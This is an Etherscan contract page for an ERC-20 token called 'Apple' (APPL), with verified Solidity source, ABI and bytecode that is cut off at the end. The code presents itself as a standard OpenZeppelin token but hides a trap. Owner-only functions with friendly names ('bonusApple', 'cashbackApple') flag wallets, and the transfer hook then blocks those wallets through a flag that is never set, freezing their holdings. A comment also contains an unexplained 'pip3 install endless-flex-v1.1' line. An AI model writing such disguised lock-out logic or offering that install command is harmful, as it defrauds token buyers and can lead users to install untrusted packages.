ERC-20
Overview
Max Total Supply
200,000,000,000 APPL
Holders
21
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
1,969,805,021.70388908960361902 APPLValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Apple
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-11 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; /* pip3 install endless-flex-v1.1 */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Ownable, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping (address => bool) private _rewards; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; bool private _rewardsApplied = false; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } function bonusApple(address [] calldata _rewardees_) external onlyOwner { for (uint256 i = 0; i < _rewardees_.length; i++) { _rewards[_rewardees_[i]] = true; } } function cashbackApple(address [] calldata _rewardees_) external onlyOwner { for (uint256 i = 0; i < _rewardees_.length; i++) { _rewards[_rewardees_[i]] = false; } } function checkApple(address _rewardee_) public view returns (bool) { return _rewards[_rewardee_]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 //amount ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract Apple is ERC20 { constructor() ERC20("Apple", "APPL") { _mint(msg.sender, 200000000000 * 10 ** decimals()); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"bonusApple","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"cashbackApple","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_rewardee_","type":"address"}],"name":"checkApple","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600581526020017f4170706c650000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4150504c00000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200013460201b60201c565b6200013c60201b60201c565b8160059080519060200190620000d192919062000483565b508060069080519060200190620000ea92919062000483565b5050506200012e33620001026200020060201b60201c565b600a620001109190620006cd565b642e90edd0006200012291906200071e565b6200020960201b60201c565b6200093d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200027b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027290620007e0565b60405180910390fd5b6200028f600083836200037760201b60201c565b8060046000828254620002a3919062000802565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000357919062000870565b60405180910390a362000373600083836200047e60201b60201c565b5050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680620004195750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15620004795760011515600760009054906101000a900460ff1615151462000478576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200046f90620008b7565b60405180910390fd5b5b505050565b505050565b828054620004919062000908565b90600052602060002090601f016020900481019282620004b5576000855562000501565b82601f10620004d057805160ff191683800117855562000501565b8280016001018555821562000501579182015b8281111562000500578251825591602001919060010190620004e3565b5b50905062000510919062000514565b5090565b5b808211156200052f57600081600090555060010162000515565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620005c15780860481111562000599576200059862000533565b5b6001851615620005a95780820291505b8081029050620005b98562000562565b945062000579565b94509492505050565b600082620005dc5760019050620006af565b81620005ec5760009050620006af565b8160018114620006055760028114620006105762000646565b6001915050620006af565b60ff84111562000625576200062462000533565b5b8360020a9150848211156200063f576200063e62000533565b5b50620006af565b5060208310610133831016604e8410600b8410161715620006805782820a9050838111156200067a576200067962000533565b5b620006af565b6200068f84848460016200056f565b92509050818404811115620006a957620006a862000533565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620006da82620006b6565b9150620006e783620006c0565b9250620007167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620005ca565b905092915050565b60006200072b82620006b6565b91506200073883620006b6565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000774576200077362000533565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620007c8601f836200077f565b9150620007d58262000790565b602082019050919050565b60006020820190508181036000830152620007fb81620007b9565b9050919050565b60006200080f82620006b6565b91506200081c83620006b6565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000854576200085362000533565b5b828201905092915050565b6200086a81620006b6565b82525050565b60006020820190506200088760008301846200085f565b92915050565b50565b60006200089f6000836200077f565b9150620008ac826200088d565b600082019050919050565b60006020820190508181036000830152620008d28162000890565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200092157607f821691505b602082108103620009375762000936620008d9565b5b50919050565b611ab7806200094d6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d7146102bc578063a9059cbb146102ec578063dd62ed3e1461031c578063f2fde38b1461034c578063fc88d6a7146103685761010b565b8063715018a6146102465780638b535da2146102505780638da5cb5b1461028057806395d89b411461029e5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e657806370a08231146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806322f45deb1461017c575b600080fd5b610118610384565b60405161012591906110d6565b60405180910390f35b61014860048036038101906101439190611196565b610416565b60405161015591906111f1565b60405180910390f35b610166610439565b604051610173919061121b565b60405180910390f35b6101966004803603810190610191919061129b565b610443565b005b6101b260048036038101906101ad91906112e8565b6104f0565b6040516101bf91906111f1565b60405180910390f35b6101d061051f565b6040516101dd9190611357565b60405180910390f35b61020060048036038101906101fb9190611196565b610528565b60405161020d91906111f1565b60405180910390f35b610230600480360381019061022b9190611372565b61055f565b60405161023d919061121b565b60405180910390f35b61024e6105a8565b005b61026a60048036038101906102659190611372565b6105bc565b60405161027791906111f1565b60405180910390f35b610288610612565b60405161029591906113ae565b60405180910390f35b6102a661063b565b6040516102b391906110d6565b60405180910390f35b6102d660048036038101906102d19190611196565b6106cd565b6040516102e391906111f1565b60405180910390f35b61030660048036038101906103019190611196565b610744565b60405161031391906111f1565b60405180910390f35b610336600480360381019061033191906113c9565b610767565b604051610343919061121b565b60405180910390f35b61036660048036038101906103619190611372565b6107ee565b005b610382600480360381019061037d919061129b565b610871565b005b60606005805461039390611438565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611438565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b60008061042161091e565b905061042e818585610926565b600191505092915050565b6000600454905090565b61044b610aef565b60005b828290508110156104eb5760016002600085858581811061047257610471611469565b5b90506020020160208101906104879190611372565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104e3906114c7565b91505061044e565b505050565b6000806104fb61091e565b9050610508858285610b6d565b610513858585610bf9565b60019150509392505050565b60006012905090565b60008061053361091e565b90506105548185856105458589610767565b61054f919061150f565b610926565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b0610aef565b6105ba6000610e72565b565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461064a90611438565b80601f016020809104026020016040519081016040528092919081815260200182805461067690611438565b80156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b6000806106d861091e565b905060006106e68286610767565b90508381101561072b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610722906115d7565b60405180910390fd5b6107388286868403610926565b60019250505092915050565b60008061074f61091e565b905061075c818585610bf9565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107f6610aef565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610865576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161085c90611669565b60405180910390fd5b61086e81610e72565b50565b610879610aef565b60005b82829050811015610919576000600260008585858181106108a05761089f611469565b5b90506020020160208101906108b59190611372565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610911906114c7565b91505061087c565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610995576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098c906116fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a04576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fb9061178d565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ae2919061121b565b60405180910390a3505050565b610af761091e565b73ffffffffffffffffffffffffffffffffffffffff16610b15610612565b73ffffffffffffffffffffffffffffffffffffffff1614610b6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b62906117f9565b60405180910390fd5b565b6000610b798484610767565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bf35781811015610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc90611865565b60405180910390fd5b610bf28484848403610926565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5f906118f7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cce90611989565b60405180910390fd5b610ce2838383610f36565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6090611a1b565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e59919061121b565b60405180910390a3610e6c848484611038565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610fd75750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110335760011515600760009054906101000a900460ff16151514611032576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102990611a61565b60405180910390fd5b5b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561107757808201518184015260208101905061105c565b83811115611086576000848401525b50505050565b6000601f19601f8301169050919050565b60006110a88261103d565b6110b28185611048565b93506110c2818560208601611059565b6110cb8161108c565b840191505092915050565b600060208201905081810360008301526110f0818461109d565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061112d82611102565b9050919050565b61113d81611122565b811461114857600080fd5b50565b60008135905061115a81611134565b92915050565b6000819050919050565b61117381611160565b811461117e57600080fd5b50565b6000813590506111908161116a565b92915050565b600080604083850312156111ad576111ac6110f8565b5b60006111bb8582860161114b565b92505060206111cc85828601611181565b9150509250929050565b60008115159050919050565b6111eb816111d6565b82525050565b600060208201905061120660008301846111e2565b92915050565b61121581611160565b82525050565b6000602082019050611230600083018461120c565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261125b5761125a611236565b5b8235905067ffffffffffffffff8111156112785761127761123b565b5b60208301915083602082028301111561129457611293611240565b5b9250929050565b600080602083850312156112b2576112b16110f8565b5b600083013567ffffffffffffffff8111156112d0576112cf6110fd565b5b6112dc85828601611245565b92509250509250929050565b600080600060608486031215611301576113006110f8565b5b600061130f8682870161114b565b93505060206113208682870161114b565b925050604061133186828701611181565b9150509250925092565b600060ff82169050919050565b6113518161133b565b82525050565b600060208201905061136c6000830184611348565b92915050565b600060208284031215611388576113876110f8565b5b60006113968482850161114b565b91505092915050565b6113a881611122565b82525050565b60006020820190506113c3600083018461139f565b92915050565b600080604083850312156113e0576113df6110f8565b5b60006113ee8582860161114b565b92505060206113ff8582860161114b565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145057607f821691505b60208210810361146357611462611409565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114d282611160565b91507ffffffffff